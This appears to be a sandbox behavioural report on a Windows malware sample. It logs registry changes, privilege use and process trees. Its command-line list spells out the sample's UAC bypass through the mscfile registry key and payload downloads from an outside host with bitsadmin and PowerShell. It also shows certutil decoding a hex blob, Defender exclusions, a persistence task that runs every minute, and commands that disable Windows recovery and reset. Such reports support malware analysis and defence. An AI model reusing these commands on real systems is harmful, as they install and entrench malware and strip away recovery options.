File opened for modification C:\Windows\SysWOW64\Recovery\ReAgent.xml C:\Windows\SysWOW64\ReAgentc.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Logs\ReAgent\ReAgent.log C:\Windows\SysWOW64\ReAgentc.exe N/A
File opened for modification C:\Windows\Panther\UnattendGC\setuperr.log C:\Windows\SysWOW64\ReAgentc.exe N/A
File opened for modification C:\Windows\Panther\UnattendGC\diagerr.xml C:\Windows\SysWOW64\ReAgentc.exe N/A
File opened for modification C:\Windows\Panther\UnattendGC\diagwrn.xml C:\Windows\SysWOW64\ReAgentc.exe N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\sc.exe N/A
N/A N/A C:\Windows\SysWOW64\sc.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\sc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\ReAgentc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\bjhbgj.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\sc.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (data) \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656} C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Mode = "4" C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\mscfile\shell C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = ffffffff C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:PID = "0" C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1092616257" C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\mscfile\shell\open\command C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\mscfile\shell\open\command\ = "cmd.exe /c reg delete HKCU\\Software\\Classes\\mscfile\\shell\\open\\command /f & C:\\Windows\\System32\\cmd.exe" C:\Windows\system32\reg.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\LogicalViewMode = "1" C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByDirection = "1" C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1" C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\mscfile C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Documents" C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupView = "0" C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 14002e80922b16d365937a46956b92703aca08af0000 C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\mscfile\shell\open C:\Windows\system32\reg.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f50e04fd020ea3a6910a2d808002b30309d0000 C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\IconSize = "16" C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\NodeSlot = "1" C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe N/A
Key created \Registry\User\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\NotificationData C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\system32\reg.exe N/A

Runs net.exe

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\schtasks.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Uni.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Uni.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Uni.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Uni.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Uni.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Uni.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Uni.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Uni.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Uni.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Uni.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1060 wrote to memory of 2704 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 1060 wrote to memory of 2704 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 2704 wrote to memory of 4460 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2704 wrote to memory of 4460 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1060 wrote to memory of 2084 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1060 wrote to memory of 2084 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1060 wrote to memory of 428 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\bitsadmin.exe
PID 1060 wrote to memory of 428 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\bitsadmin.exe
PID 1060 wrote to memory of 3876 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1060 wrote to memory of 3876 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1060 wrote to memory of 3348 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1060 wrote to memory of 3348 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3348 wrote to memory of 552 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\certutil.exe
PID 3348 wrote to memory of 552 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\certutil.exe
PID 3348 wrote to memory of 564 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\Uni.exe
PID 3348 wrote to memory of 564 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\Uni.exe
PID 564 wrote to memory of 4112 N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 564 wrote to memory of 4112 N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 564 wrote to memory of 1744 N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 564 wrote to memory of 1744 N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 564 wrote to memory of 460 N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 564 wrote to memory of 460 N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 564 wrote to memory of 4028 N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 564 wrote to memory of 4028 N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 564 wrote to memory of 5032 N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe C:\Windows\System32\schtasks.exe
PID 564 wrote to memory of 5032 N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe C:\Windows\System32\schtasks.exe
PID 564 wrote to memory of 412 N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe C:\Users\Admin\AppData\Local\Temp\bjhbgj.exe
PID 564 wrote to memory of 412 N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe C:\Users\Admin\AppData\Local\Temp\bjhbgj.exe
PID 564 wrote to memory of 412 N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe C:\Users\Admin\AppData\Local\Temp\bjhbgj.exe
PID 412 wrote to memory of 3212 N/A C:\Users\Admin\AppData\Local\Temp\bjhbgj.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 412 wrote to memory of 3212 N/A C:\Users\Admin\AppData\Local\Temp\bjhbgj.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 412 wrote to memory of 3212 N/A C:\Users\Admin\AppData\Local\Temp\bjhbgj.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 412 wrote to memory of 2516 N/A C:\Users\Admin\AppData\Local\Temp\bjhbgj.exe C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe
PID 412 wrote to memory of 2516 N/A C:\Users\Admin\AppData\Local\Temp\bjhbgj.exe C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe
PID 412 wrote to memory of 3516 N/A C:\Users\Admin\AppData\Local\Temp\bjhbgj.exe C:\Windows\SysWOW64\cmd.exe
PID 412 wrote to memory of 3516 N/A C:\Users\Admin\AppData\Local\Temp\bjhbgj.exe C:\Windows\SysWOW64\cmd.exe
PID 412 wrote to memory of 3516 N/A C:\Users\Admin\AppData\Local\Temp\bjhbgj.exe C:\Windows\SysWOW64\cmd.exe
PID 3516 wrote to memory of 4596 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\ReAgentc.exe
PID 3516 wrote to memory of 4596 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\ReAgentc.exe
PID 3516 wrote to memory of 4596 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\ReAgentc.exe
PID 3516 wrote to memory of 1668 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3516 wrote to memory of 1668 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3516 wrote to memory of 1668 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3516 wrote to memory of 1548 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3516 wrote to memory of 1548 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3516 wrote to memory of 1548 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3516 wrote to memory of 1580 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3516 wrote to memory of 1580 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3516 wrote to memory of 1580 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3516 wrote to memory of 5024 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3516 wrote to memory of 5024 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3516 wrote to memory of 5024 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3516 wrote to memory of 3204 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3516 wrote to memory of 3204 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3516 wrote to memory of 3204 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3516 wrote to memory of 3120 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3516 wrote to memory of 3120 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3516 wrote to memory of 3120 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3516 wrote to memory of 244 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3516 wrote to memory of 244 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3516 wrote to memory of 244 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3516 wrote to memory of 1952 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3516 wrote to memory of 1952 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3516 wrote to memory of 1952 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Uac Bypass Rat.bat"

C:\Windows\system32\net.exe

net session

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 session

C:\Windows\system32\reg.exe

reg add HKCU\Software\Classes\mscfile\shell\open\command /ve /d "cmd.exe /c reg delete HKCU\Software\Classes\mscfile\shell\open\command /f & C:\Windows\System32\cmd.exe" /f

C:\Windows\system32\bitsadmin.exe

bitsadmin /transfer mydownloadjob /download /priority normal https://xworm.xyz/stuff/$sxr-test.bat C:\Users\Admin\AppData\Local\Temp\$sxr-test.bat

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Invoke-WebRequest -Uri 'https://xworm.xyz/stuff/$sxr-test.bat' -OutFile 'C:\Users\Admin\AppData\Local\Temp\$sxr-test.bat'"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\$sxr-test.bat"

C:\Windows\system32\certutil.exe

certutil -decodehex temp.hex "Uni.exe"

C:\Users\Admin\AppData\Local\Temp\Uni.exe

Uni.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Uni.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Uni.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Uni.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Uni.exe'

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Uni" /tr "C:\Users\Admin\Uni.exe"

C:\Users\Admin\Uni.exe

C:\Users\Admin\Uni.exe

C:\Users\Admin\Uni.exe

C:\Users\Admin\Uni.exe

C:\Users\Admin\AppData\Local\Temp\bjhbgj.exe

"C:\Users\Admin\AppData\Local\Temp\bjhbgj.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAcABrACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGoAagBnACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG4AbgB5ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGoAZgBmACMAPgA="

C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe

"C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\reset survival.bat" "

C:\Windows\SysWOW64\ReAgentc.exe

reagentc /disable

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableResetPC" /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableResetPC" /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\MiniNT" /v "NoWinRE" /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoWindowsSetupOptions" /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoControlPanel" /t REG_DWORD /d 1 /f

